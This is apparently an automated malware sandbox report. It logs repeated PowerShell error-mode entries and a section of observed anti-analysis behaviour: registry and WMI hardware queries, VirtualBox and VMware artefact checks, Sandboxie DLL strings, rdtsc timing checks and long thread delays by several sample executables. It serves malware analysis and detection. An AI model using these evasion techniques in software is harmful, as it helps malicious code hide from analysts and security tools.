Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: Global behavior Junk call stats: NtWriteFile 3424292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\filename.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\filename.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\filename.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\filename.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: D3CC.exe, 00000015.00000002.2260104833.000000000096A000.00000020.00000001.01000000.0000000D.sdmp Binary or memory string: SBIEDLL.DLL
Source: D3CC.exe, 00000015.00000002.2260104833.000000000096A000.00000020.00000001.01000000.0000000D.sdmp Binary or memory string: SBIEDLL.DLLM
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe RDTSC instruction interceptor: First address: CB05DE second address: CB05EB instructions: 0x00000000 rdtsc 0x00000002 xor cl, bl 0x00000004 cwd 0x00000006 lahf 0x00000007 not edx 0x00000009 inc cl 0x0000000b bswap eax 0x0000000d rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1270000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2FB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2EF0000 memory reserve | memory write watch
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\filename.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\filename.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\filename.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_02F2271C rdtsc 9_2_02F2271C
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 10_2_0040E670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 386 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 774 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 789 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 2348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 7381
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 791
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 750
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5601
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4021
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3896 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe TID: 416 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe TID: 416 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3616 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3588 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4380 Thread sleep count: 2194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4384 Thread sleep count: 1836 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 664 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4168 Thread sleep count: 5601 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep count: 4021 > 30
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 10_2_0040FB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000021.00000002.2898035450.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000F
Source: explorer.exe, 00000021.00000003.2390097431.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000021.00000003.2402698538.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\07eS
Source: explorer.exe, 00000021.00000002.2905755218.0000000007D07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTCCESVMWare
Source: explorer.exe, 00000021.00000002.2905755218.0000000007B80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000021.00000003.2382527869.000000000C731000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000+
